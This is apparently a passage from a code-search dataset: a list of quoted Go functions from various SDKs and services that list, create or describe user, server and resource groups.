&groupList, nil\n}", "func CreateListServerGroupsRequest() (request *ListServerGroupsRequest) {\n\trequest = &ListServerGroupsRequest{\n\t\tRpcRequest: &requests.RpcRequest{},\n\t}\n\trequest.InitWithApiInfo(\"Alb\", \"2020-06-16\", \"ListServerGroups\", \"alb\", \"openAPI\")\n\trequest.Method = requests.POST\n\treturn\n}", "func NewDefaultGroups(ctx *pulumi.Context,\n\tname string, args *DefaultGroupsArgs, opts ...pulumi.ResourceOption) (*DefaultGroups, error) {\n\tif args == nil || args.GroupIds == nil {\n\t\treturn nil, errors.New(\"missing required argument 'GroupIds'\")\n\t}\n\tif args == nil || args.RealmId == nil {\n\t\treturn nil, errors.New(\"missing required argument 'RealmId'\")\n\t}\n\tif args == nil {\n\t\targs = &DefaultGroupsArgs{}\n\t}\n\tvar resource DefaultGroups\n\terr := ctx.RegisterResource(\"keycloak:index/defaultGroups:DefaultGroups\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewListServerGroupOK() *ListServerGroupOK {\n\treturn &ListServerGroupOK{}\n}", "func List(c messagebird.Client, options *messagebird.PaginationRequest) (*Groups, error) {\n\tgroupList := &Groups{}\n\tif err := c.Request(groupList, http.MethodGet, path+\"?\"+options.QueryParams(), nil); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn groupList, nil\n}", "func NewListGroupsBadRequest() *ListGroupsBadRequest {\n\treturn &ListGroupsBadRequest{}\n}", "func (c *GroupController) List(ctx *app.ListGroupContext) error {\n\t// GroupController_List: start_implement\n\n\tdataStore := &dal.DataStore{}\n\tdataStore.GetSession()\n\t// Close the session\n\tdefer dataStore.Close()\n\tdc := dal.NewDalGroup(dataStore)\n\n\tgroups, err := dc.FetchAll()\n\n\tif err != nil {\n\t\tctx.ResponseData.Service.LogError(\"InternalServerError\", \"req_id\", middleware.ContextRequestID(ctx), \"ctrl\", \"Group\", \"action\", \"List\", ctx.RequestData.Request.Method, ctx.RequestData.Request.URL, \"databaseError\", err.Error())\n\t\treturn ctx.InternalServerError()\n\t}\n\n\tres := make(app.GwentapiGroupCollection, len(*groups))\n\n\tlastModified := time.Time{}\n\tfor i, group := range *groups {\n\t\tg, _ := factory.CreateGroup(&group)\n\n\t\tif lastModified.Before(group.Last_Modified) {\n\t\t\tlastModified = group.Last_Modified\n\t\t}\n\n\t\tres[i] = g\n\t}\n\n\t// GroupController_List: end_implement\n\thelpers.LastModified(ctx.ResponseData, lastModified)\n\tif ctx.IfModifiedSince != nil {\n\t\tif !helpers.IsModified(*ctx.IfModifiedSince, lastModified) {\n\t\t\treturn ctx.NotModified()\n\t\t}\n\t}\n\treturn ctx.OK(res)\n}", "func NewGroups(filename string, bad BadLineHandler) (*HTGroup, error) {\n\thtGroup := HTGroup{\n\t\tfilePath: filename,\n\t}\n\treturn &htGroup, htGroup.ReloadGroups(bad)\n}", "func NewListNSGroupsParams() *ListNSGroupsParams {\n\tvar (\n\t\tpageSizeDefault = int64(1000)\n\t\tpopulateReferencesDefault = bool(false)\n\t)\n\treturn &ListNSGroupsParams{\n\t\tPageSize: &pageSizeDefault,\n\t\tPopulateReferences: &populateReferencesDefault,\n\n\t\ttimeout: cr.DefaultTimeout,\n\t}\n}", "func (capi ClientAPI) Groups(conf map[string]string) error {\n\n\turl := fmt.Sprintf(\"http://%s:%s/v1/groups\", conf[\"host\"], conf[\"port\"])\n\n\t// Build the request\n\treq, err := http.NewRequest(\"GET\", url, nil)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Send the request via a client\n\tclient := &http.Client{}\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Defer the closing of the body\n\tdefer resp.Body.Close()\n\t// Read the content into a byte array\n\tbody, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Marshal API data into map\n\tvar groupmap map[string]string\n\terr = json.Unmarshal(body, &groupmap)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tw := new(tabwriter.Writer)\n\n\t// Format in tab-separated columns with a tab stop of 8.\n\tw.Init(os.Stdout, 0, 8, 0, '\\t', 0)\n\tfmt.Fprintln(w, \"UUID\\tGROUP NAME\")\n\n\tfor agentUUID, groupName := range groupmap {\n\t\tfmt.Fprintf(\n\t\t\tw,\n\t\t\t\"%s\\t%s\\n\",\n\t\t\thostresources.TruncateID(agentUUID),\n\t\t\tgroupName,\n\t\t)\n\t}\n\tfmt.Fprintln(w)\n\tw.Flush()\n\n\treturn nil\n\n}", "func getGroups(w http.ResponseWriter, r *http.Request) {\n InitResponse(&w)\n if r.Method == \"OPTIONS\" {return}\n\n allow, _ := HasPermission(&w, r, CoreGroupModuleID, CoreAccessRead)\n if !allow {\n w.WriteHeader(http.StatusUnauthorized)\n json.NewEncoder(w).Encode(&CoreMessage{\n Message: \"Not authorized!\",\n })\n return\n }\n\n groups := []CoreGroup{}\n\n err := Db.Model(&groups).Select()\n if err != nil {\n w.WriteHeader(http.StatusBadRequest)\n return\n }\n\n w.WriteHeader(http.StatusOK)\n json.NewEncoder(w).Encode(groups)\n}", "func NewUserGroupListOK() *UserGroupListOK {\n\treturn &UserGroupListOK{}\n}", "func NewListNSGroupsParamsWithHTTPClient(client *http.Client) *ListNSGroupsParams {\n\tvar (\n\t\tpageSizeDefault = int64(1000)\n\t\tpopulateReferencesDefault = bool(false)\n\t)\n\treturn &ListNSGroupsParams{\n\t\tPageSize: &pageSizeDefault,\n\t\tPopulateReferences: &populateReferencesDefault,\n\t\tHTTPClient: client,\n\t}\n}", "func (s *GroupsService) List(opt ...CallOption) ([]*Group, *Response, error) {\n\tgroups, resp, err := listGroup(s.client, \"groups\", opt...)\n\n\treturn groups, resp, err\n}", "func NewListGroupsNotFound() *ListGroupsNotFound {\n\treturn &ListGroupsNotFound{}\n}", "func (s *GroupsService) List(ctx context.Context, opts *PagingOptions) (*GroupList, error) {\n\tquery := addPaging(url.Values{}, opts)\n\treq, err := s.Client.NewRequest(ctx, http.MethodGet, newURI(groupsURI), WithQuery(query))\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed: , %w\", err)\n\t}\n\tres, resp, err := s.Client.Do(req)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed: , %w\", err)\n\t}\n\n\tif resp != nil && resp.StatusCode == http.StatusNotFound {\n\t\treturn nil, ErrNotFound\n\t}\n\n\tg := &GroupList{\n\t\tGroups: []*Group{},\n\t}\n\tif err := json.Unmarshal(res, g); err != nil {\n\t\treturn nil, fmt.Errorf(\"list groups failed, unable to unmarshal repository list json: , %w\", err)\n\t}\n\n\tfor _, r := range g.GetGroups() {\n\t\tr.Session.set(resp)\n\t}\n\n\treturn g, nil\n}", "func CreateListServerGroupsResponse() (response *ListServerGroupsResponse) {\n\tresponse = &ListServerGroupsResponse{\n\t\tBaseResponse: &responses.BaseResponse{},\n\t}\n\treturn\n}", "func NewGetHostGroupsDefault(code int) *GetHostGroupsDefault {\n\treturn &GetHostGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (c *tiKVGroups) List(opts v1.ListOptions) (result *v1alpha1.TiKVGroupList, err error) {\n\tvar timeout time.Duration\n\tif opts.TimeoutSeconds != nil {\n\t\ttimeout = time.Duration(*opts.TimeoutSeconds) * time.Second\n\t}\n\tresult = &v1alpha1.TiKVGroupList{}\n\terr = c.client.Get().\n\t\tNamespace(c.ns).\n\t\tResource(\"tikvgroups\").\n\t\tVersionedParams(&opts, scheme.ParameterCodec).\n\t\tTimeout(timeout).\n\t\tDo().\n\t\tInto(result)\n\treturn\n}", "func (client IdentityClient) ListGroups(ctx context.Context, request ListGroupsRequest) (response ListGroupsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif client.RetryPolicy() != nil {\n\t\tpolicy = *client.RetryPolicy()\n\t}\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.listGroups, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = ListGroupsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = ListGroupsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(ListGroupsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into ListGroupsResponse\")\n\t}\n\treturn\n}", "func CreateListExperimentGroupsRequest() (request *ListExperimentGroupsRequest) {\n\trequest = &ListExperimentGroupsRequest{\n\t\tRoaRequest: &requests.RoaRequest{},\n\t}\n\trequest.InitWithApiInfo(\"PaiRecService\", \"2022-12-13\", \"ListExperimentGroups\", \"/api/v1/experimentgroups\", \"\", \"\")\n\trequest.Method = requests.GET\n\treturn\n}", "func newRouteGroups(c *ZalandoV1Client, namespace string) *routeGroups {\n\treturn &routeGroups{\n\t\tclient: c.RESTClient(),\n\t\tns: namespace,\n\t}\n}", "func NewGetGroupOK() *GetGroupOK {\n\treturn &GetGroupOK{}\n}", "func CreateGroup(params types.ContextParams, clientSet apimachinery.ClientSetInterface, groupItems []metadata.Group) []Group {\n\tresults := make([]Group, 0)\n\tfor _, grp := range groupItems {\n\n\t\tresults = append(results, &group{\n\t\t\tgrp: grp,\n\t\t\tparams: params,\n\t\t\tclientSet: clientSet,\n\t\t})\n\t}\n\n\treturn results\n}", "func (rm *resourceManager) newListRequestPayload(\n\tr *resource,\n) (*svcsdk.DescribeReplicationGroupsInput, error) {\n\tres := &svcsdk.DescribeReplicationGroupsInput{}\n\n\tif r.ko.Spec.ReplicationGroupID != nil {\n\t\tres.SetReplicationGroupId(*r.ko.Spec.ReplicationGroupID)\n\t}\n\n\treturn res, nil\n}", "func (client *ContainerGroupsClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ContainerGroupsClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerInstance/containerGroups\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2023-05-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func NewGetHostGroupsOK() *GetHostGroupsOK {\n\treturn &GetHostGroupsOK{}\n}", "func (m *GraphBaseServiceClient) Groups()(*ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.GroupsRequestBuilder) {\n return ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.NewGroupsRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func (m *GraphBaseServiceClient) Groups()(*ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.GroupsRequestBuilder) {\n return ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.NewGroupsRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func NewPostVolumeGroupsListDefault(code int) *PostVolumeGroupsListDefault {\n\treturn &PostVolumeGroupsListDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (c *MockResourceGroupsClient) List(ctx context.Context, filter string) ([]resources.Group, error) {\n\tif filter != \"\" {\n\t\treturn nil, fmt.Errorf(\"unsupported non-empty filter: %s\", filter)\n\t}\n\tvar l []resources.Group\n\tfor _, rg := range c.RGs {\n\t\tl = append(l, rg)\n\t}\n\treturn l, nil\n}", "func (client *ClustersClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ClustersClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DBforPostgreSQL/serverGroupsv2\"\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2022-11-08\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func NewGroup(dataframe *DataFrame, columns ...string) *Groups {\n\t// ret := &Groups{Columns: []string{}, Grouper: columns, Group: make(map[types.C][]indices.Index), Df: dataframe}\n\tret := &Groups{Keys: []Keys{}, Columns: []string{}, Grouper: columns, Group: make(map[types.C][]indices.Index), Df: dataframe}\n\n\treturn ret\n}", "func (l *GroupLookup) newKeyGroup(entries []groupKeyListElement) *groupKeyList {\n\tid := l.nextID\n\tl.nextID++\n\treturn &groupKeyList{\n\t\tid: id,\n\t\telements: entries,\n\t}\n}", "func ListUserGroup(w http.ResponseWriter, r *http.Request) {\n\tfLog := userMgmtLogger.WithField(\"func\", \"ListUserGroup\").WithField(\"RequestID\", r.Context().Value(constants.RequestID)).WithField(\"path\", r.URL.Path).WithField(\"method\", r.Method)\n\n\tiauthctx := r.Context().Value(constants.HansipAuthentication)\n\tif iauthctx == nil {\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusUnauthorized, \"You are not authorized to access this resource\", nil, nil)\n\t\treturn\n\t}\n\n\tparams, err := helper.ParsePathParams(fmt.Sprintf(\"%s/management/user/{userRecId}/groups\", apiPrefix), r.URL.Path)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tuser, err := UserRepo.GetUserByRecID(r.Context(), params[\"userRecId\"])\n\tif err != nil {\n\t\tfLog.Errorf(\"UserRepo.GetUserByRecID got %s\", err.Error())\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusInternalServerError, err.Error(), nil, nil)\n\t\treturn\n\t}\n\tif user == nil {\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusNotFound, fmt.Sprintf(\"User recid %s not found\", params[\"userRecId\"]), nil, nil)\n\t\treturn\n\t}\n\n\tpageRequest, err := helper.NewPageRequestFromRequest(r)\n\tif err != nil {\n\t\tfLog.Errorf(\"helper.NewPageRequestFromRequest got %s\", err.Error())\n\t\thelper.WriteHTTPResponse(r.Context(), w, http.StatusBadRequest, err.Error(), nil, nil)\n\t\treturn\n\t}\n\tgroups, page, err := UserGroupRepo.ListUserGroupByUser(r.Context(), user, pageRequest)\n\tif err != nil {\n\t\tfLog.Errorf(\"UserGroupRepo.ListUserGroupByUser got %s\", err.Error())\n\t}\n\tsgroups := make([]*SimpleGroup, len(groups))\n\tfor k, v := range groups {\n\t\tsgroups[k] = &SimpleGroup{\n\t\t\tRecID: v.RecID,\n\t\t\tGroupName: v.GroupName,\n\t\t}\n\t}\n\tret := make(map[string]interface{})\n\tret[\"groups\"] = sgroups\n\tret[\"page\"] = page\n\thelper.WriteHTTPResponse(r.Context(), w, http.StatusOK, \"List of groups paginated\", nil, ret)\n}", "func (client *Client) ListResourceGroupsWithOptions(request *ListResourceGroupsRequest, runtime *util.RuntimeOptions) (_result *ListResourceGroupsResponse, _err error) {\n\t_err = util.ValidateModel(request)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\tquery := map[string]interface{}{}\n\tif !tea.BoolValue(util.IsUnset(request.DisplayName)) {\n\t\tquery[\"DisplayName\"] = request.DisplayName\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.IncludeTags)) {\n\t\tquery[\"IncludeTags\"] = request.IncludeTags\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Name)) {\n\t\tquery[\"Name\"] = request.Name\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.PageNumber)) {\n\t\tquery[\"PageNumber\"] = request.PageNumber\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.PageSize)) {\n\t\tquery[\"PageSize\"] = request.PageSize\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.ResourceGroupId)) {\n\t\tquery[\"ResourceGroupId\"] = request.ResourceGroupId\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.ResourceGroupIds)) {\n\t\tquery[\"ResourceGroupIds\"] = request.ResourceGroupIds\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Status)) {\n\t\tquery[\"Status\"] = request.Status\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Tag)) {\n\t\tquery[\"Tag\"] = request.Tag\n\t}\n\n\treq := &openapi.OpenApiRequest{\n\t\tQuery: openapiutil.Query(query),\n\t}\n\tparams := &openapi.Params{\n\t\tAction: tea.String(\"ListResourceGroups\"),\n\t\tVersion: tea.String(\"2020-03-31\"),\n\t\tProtocol: tea.String(\"HTTPS\"),\n\t\tPathname: tea.String(\"/\"),\n\t\tMethod: tea.String(\"POST\"),\n\t\tAuthType: tea.String(\"AK\"),\n\t\tStyle: tea.String(\"RPC\"),\n\t\tReqBodyType: tea.String(\"formData\"),\n\t\tBodyType: tea.String(\"json\"),\n\t}\n\t_result = &ListResourceGroupsResponse{}\n\t_body, _err := client.CallApi(params, req, runtime)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\t_err = tea.Convert(_body, &_result)\n\treturn _result, _err\n}", "func NewGetAllGroupsOK() *GetAllGroupsOK {\n\n\treturn &GetAllGroupsOK{}\n}", "func (s *ServiceOp) List(ctx context.Context, input *ListGroupsInput) (*ListGroupsOutput, error) {\n\tr := client.NewRequest(http.MethodGet, \"/compute/azure/group\")\n\tresp, err := client.RequireOK(s.Client.Do(ctx, r))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer resp.Body.Close()\n\n\tgs, err := groupsFromHttpResponse(resp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &ListGroupsOutput{Groups: gs}, nil\n}", "func (client IdentityClient) listGroups(ctx context.Context, request common.OCIRequest, binaryReqBody *common.OCIReadSeekCloser, extraHeaders map[string]string) (common.OCIResponse, error) {\n\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/groups\", binaryReqBody, extraHeaders)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response ListGroupsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (db *MySQLDB) ListGroups(ctx context.Context, tenant *Tenant, request *helper.PageRequest) ([]*Group, *helper.Page, error) {\n\tfLog := mysqlLog.WithField(\"func\", \"ListGroups\").WithField(\"RequestID\", ctx.Value(constants.RequestID))\n\tq := \"SELECT COUNT(*) AS CNT FROM HANSIP_GROUP\"\n\tret := make([]*Group, 0)\n\trow := db.instance.QueryRowContext(ctx, q)\n\tcount := 0\n\terr := row.Scan(&count)\n\tif err != nil {\n\t\tif err == sql.ErrNoRows {\n\t\t\treturn ret, helper.NewPage(request, uint(count)), nil\n\t\t}\n\t\tfLog.Errorf(\"row.Scan got %s\", err.Error())\n\t\treturn nil, nil, &ErrDBScanError{\n\t\t\tWrapped: err,\n\t\t\tMessage: \"Error ListGroups\",\n\t\t\tSQL: q,\n\t\t}\n\t}\n\tpage := helper.NewPage(request, uint(count))\n\tq = fmt.Sprintf(\"SELECT REC_ID, GROUP_NAME, GROUP_DOMAIN, DESCRIPTION FROM HANSIP_GROUP WHERE GROUP_DOMAIN=? ORDER BY GROUP_NAME %s LIMIT %d, %d\", request.Sort, page.OffsetStart, page.OffsetEnd-page.OffsetStart)\n\trows, err := db.instance.QueryContext(ctx, q, tenant.Domain)\n\tif err != nil {\n\t\tfLog.Errorf(\"db.instance.QueryContext got %s. SQL = %s\", err.Error(), q)\n\t\treturn nil, nil, &ErrDBQueryError{\n\t\t\tWrapped: err,\n\t\t\tMessage: \"Error ListGroups\",\n\t\t\tSQL: q,\n\t\t}\n\t}\n\tdefer rows.Close()\n\tfor rows.Next() {\n\t\tr := &Group{}\n\t\terr := rows.Scan(&r.RecID, &r.GroupName, &r.GroupDomain, &r.Description)\n\t\tif err != nil {\n\t\t\tfLog.Warnf(\"row.Scan got %s\", err.Error())\n\t\t\treturn nil, nil, &ErrDBScanError{\n\t\t\t\tWrapped: err,\n\t\t\t\tMessage: \"Error ListGroups\",\n\t\t\t\tSQL: q,\n\t\t\t}\n\t\t} else {\n\t\t\tret = append(ret, r)\n\t\t}\n\t}\n\treturn ret, page, nil\n}", "func (m *StoreItemRequestBuilder) Groups()(*i943058511484df328af302c39ee5cb2c343138e90a60de21e94bad79f3a4f322.GroupsRequestBuilder) {\n return i943058511484df328af302c39ee5cb2c343138e90a60de21e94bad79f3a4f322.NewGroupsRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func CreateListExperimentGroupsResponse() (response *ListExperimentGroupsResponse) {\n\tresponse = &ListExperimentGroupsResponse{\n\t\tBaseResponse: &responses.BaseResponse{},\n\t}\n\treturn\n}", "func NewGroup()(*Group) {\n m := &Group{\n DirectoryObject: *NewDirectoryObject(),\n }\n odataTypeValue := \"#microsoft.graph.group\";\n m.SetOdataType(&odataTypeValue);\n return m\n}", "func NewPostVolumeGroupsListOK() *PostVolumeGroupsListOK {\n\treturn &PostVolumeGroupsListOK{}\n}", "func (s *ServiceOp) List(ctx context.Context, input *ListGroupsInput) (*ListGroupsOutput, error) {\n\tr := client.NewRequest(http.MethodGet, \"/azure/compute/group\")\n\tresp, err := client.RequireOK(s.Client.Do(ctx, r))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer resp.Body.Close()\n\n\tgs, err := groupsFromHttpResponse(resp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &ListGroupsOutput{Groups: gs}, nil\n}", "func NewListNSGroupsParamsWithTimeout(timeout time.Duration) *ListNSGroupsParams {\n\tvar (\n\t\tpageSizeDefault = int64(1000)\n\t\tpopulateReferencesDefault = bool(false)\n\t)\n\treturn &ListNSGroupsParams{\n\t\tPageSize: &pageSizeDefault,\n\t\tPopulateReferences: &populateReferencesDefault,\n\n\t\ttimeout: timeout,\n\t}\n}", "func NewDescribeGroupsResponse(payload []byte) (*DescribeGroupsResponse, error) {\n\tvar (\n\t\terr error = nil\n\t\tl int\n\t\toffset int = 0\n\t)\n\tr := &DescribeGroupsResponse{}\n\tresponseLength := int(binary.BigEndian.Uint32(payload))\n\tif responseLength+4 != len(payload) {\n\t\treturn nil, fmt.Errorf(\"describeGroups reseponse length did not match: %d!=%d\", responseLength+4, len(payload))\n\t}\n\toffset += 4\n\n\tr.CorrelationID = uint32(binary.BigEndian.Uint32(payload[offset:]))\n\toffset += 4\n\n\tgroupCount := uint32(binary.BigEndian.Uint32(payload[offset:]))\n\toffset += 4\n\n\tr.Groups = make([]*GroupDetail, groupCount)\n\n\tfor i := range r.Groups {\n\t\tgroup := &GroupDetail{}\n\n\t\tgroup.ErrorCode = int16(binary.BigEndian.Uint16(payload[offset:]))\n\t\toffset += 2\n\n\t\tif err == nil && group.ErrorCode != 0 {\n\t\t\terr = getErrorFromErrorCode(group.ErrorCode)\n\t\t}\n\n\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\toffset += 2\n\t\tgroup.GroupID = string(payload[offset : offset+l])\n\t\toffset += l\n\n\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\toffset += 2\n\t\tgroup.State = string(payload[offset : offset+l])\n\t\toffset += l\n\n\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\toffset += 2\n\t\tgroup.ProtocolType = string(payload[offset : offset+l])\n\t\toffset += l\n\n\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\toffset += 2\n\t\tgroup.Protocol = string(payload[offset : offset+l])\n\t\toffset += l\n\n\t\tmemberCount := int(binary.BigEndian.Uint32(payload[offset:]))\n\t\toffset += 4\n\n\t\tgroup.Members = make([]*MemberDetail, memberCount)\n\n\t\tfor i := range group.Members {\n\t\t\tgroup.Members[i] = &MemberDetail{}\n\n\t\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\t\toffset += 2\n\t\t\tgroup.Members[i].MemberID = string(payload[offset : offset+l])\n\t\t\toffset += l\n\n\t\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\t\toffset += 2\n\t\t\tgroup.Members[i].ClientID = string(payload[offset : offset+l])\n\t\t\toffset += l\n\n\t\t\tl = int(binary.BigEndian.Uint16(payload[offset:]))\n\t\t\toffset += 2\n\t\t\tgroup.Members[i].ClientHost = string(payload[offset : offset+l])\n\t\t\toffset += l\n\n\t\t\tl = int(binary.BigEndian.Uint32(payload[offset:]))\n\t\t\toffset += 4\n\t\t\tcopy(group.Members[i].MemberMetadata, payload[offset:offset+l])\n\t\t\toffset += l\n\n\t\t\tl = int(binary.BigEndian.Uint32(payload[offset:]))\n\t\t\toffset += 4\n\t\t\tgroup.Members[i].MemberAssignment = make([]byte, l)\n\t\t\tcopy(group.Members[i].MemberAssignment, payload[offset:offset+l])\n\t\t\toffset += l\n\t\t}\n\n\t\tr.Groups[i] = group\n\t}\n\n\treturn r, err\n}", "func DefaultGroups(clusterName, addonName string) []string {\n\treturn []string{\n\t\tfmt.Sprintf(\"system:open-cluster-management:cluster:%s:addon:%s\", clusterName, addonName),\n\t\tfmt.Sprintf(\"system:open-cluster-management:addon:%s\", addonName),\n\t\t\"system:authenticated\",\n\t}\n}", "func NewUpdateHostGroupsDefault(code int) *UpdateHostGroupsDefault {\n\treturn &UpdateHostGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func listGroups(cmd *cobra.Command, args []string) error {\n\tclient, err := getClient()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn nil\n\t}\n\tdefer client.Close()\n\n\tvar matchingGroups map[string]bool\n\tif len(args) != 0 {\n\t\t// Mark all groups mentioned on the command line\n\t\tmatchingGroups = make(map[string]bool, len(args))\n\t\tfor _, g := range args {\n\t\t\tmatchingGroups[g] = true\n\t\t}\n\t}\n\t// Get list of all groups and their roles\n\t_, roleGroups, err := getRoles(cmd, nil, true, client)\n\tif err != nil {\n\t\tfmt.Println(toAPIError(err))\n\t\treturn nil\n\t}\n\n\tgroupMap := make(groupMap)\n\tfor roleName, groups := range roleGroups {\n\t\tfor _, group := range groups {\n\t\t\tif matchingGroups != nil && !matchingGroups[group] {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tgroupMap[group] = append(groupMap[group], roleName)\n\t\t}\n\t}\n\n\t// Get sorted list of groups\n\tgroups := make([]string, 0, len(groupMap))\n\tfor group := range groupMap {\n\t\tgroups = append(groups, group)\n\t}\n\tsort.Strings(groups)\n\n\t// Display all groups\n\tverbose := viper.GetBool(verboseOpt)\n\tfor _, group := range groups {\n\t\tif verbose {\n\t\t\tfmt.Println(group, \"=\", strings.Join(groupMap[group], \", \"))\n\t\t} else {\n\t\t\tfmt.Println(group)\n\t\t}\n\t}\n\n\treturn nil\n}", "func (m *TermStoreRequestBuilder) Groups()(*i94e3df8b0a254a0fef7a65f7cbfe92598b1244a4aa6d133096ee43e26c51ba83.GroupsRequestBuilder) {\n return i94e3df8b0a254a0fef7a65f7cbfe92598b1244a4aa6d133096ee43e26c51ba83.NewGroupsRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func (client *ManagedClustersClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ManagedClustersClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2020-11-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = 